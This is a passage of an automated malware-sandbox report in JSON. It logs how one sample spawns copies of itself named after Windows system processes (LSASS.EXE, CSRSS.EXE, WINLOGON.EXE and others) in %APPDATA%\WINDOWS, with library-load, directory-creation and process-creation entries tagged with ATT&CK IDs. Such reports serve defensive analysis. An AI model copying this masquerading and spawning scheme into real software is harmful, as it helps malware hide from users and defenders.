called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005608)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005532)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005644)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005644)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005644)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005644)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005644)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005644)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004316)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005956)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005956)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005956)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005956)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005956)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005956)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005956)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005956)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004192)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004192)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004320)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004320)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004320)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004320)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004320)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004320)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004320)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003964)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003964)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006104)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006104)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005256)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005256)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006108)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006108)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004184)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004184)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004184)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004184)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004184)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004184)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004184)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004184)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004344)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002308)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002308)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002308)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002308)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002308)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002308)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003984)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003984)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004156)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004156)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003224)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003224)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004400)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004400)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003320)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003320)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005472)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003208)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003208)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006092)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006116)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006116)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"D3_08.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"IExplorer.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"WINLOGON.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"CSRSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SERVICES.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"LSASS.EXE\" failed to load missing module \"kernel32\" - [base:77cc0000; Status:00000104]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"SMSS.EXE\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500526e3977@CRYPTSP.dll\"\n \"10001100f4124775@rsaenh.dll\"\n \"10001100e0124775@rsaenh.dll\"\n \"08000900d4124775@rsaenh.dll\"\n \"0b000c00c8124775@rsaenh.dll\"\n \"0c000d00b8124775@rsaenh.dll\"\n \"0d000e00a8124775@rsaenh.dll\"\n \"0d000e0098124775@rsaenh.dll\"\n \"0b000c008c124775@rsaenh.dll\"\n \"0b000c0080124775@rsaenh.dll\"\n \"09000a0074124775@rsaenh.dll\"\n \"09000a0068124775@rsaenh.dll\"\n \"0c000d0058124775@rsaenh.dll\"\n \"0a000b004c124775@rsaenh.dll\"\n \"1000110038124775@rsaenh.dll\"\n \"0d000e0028124775@rsaenh.dll\"\n \"0a000b001c124775@rsaenh.dll\"\n \"1100120008124775@rsaenh.dll\"\n \"0b000c00fc114775@rsaenh.dll\"\n \"0c000d00ec114775@rsaenh.dll\"\n \"0e000f00dc114775@rsaenh.dll\"\n \"0e000f00cc114775@rsaenh.dll\"\n \"0e000f00bc114775@rsaenh.dll\"\n \"0e000f00ac114775@rsaenh.dll\"\n \"0e000f009c114775@rsaenh.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005080)\n \"D3_08.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter C:\\\\D3_08 (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\D3_08 (UID: 00000000-00005160)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004880)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005072)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005072)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004420)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004420)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003360)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003360)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005780)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005780)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004316)\n \"SMSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00004316)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005080)\n \"0b18ac73f9999b000adc68e424461bc13850e13bdf015457ba2890c661702ed0.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005080)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005160)\n \"D3_08.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005160)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\D3_08.exe\" - (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00004880)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00004880)\n 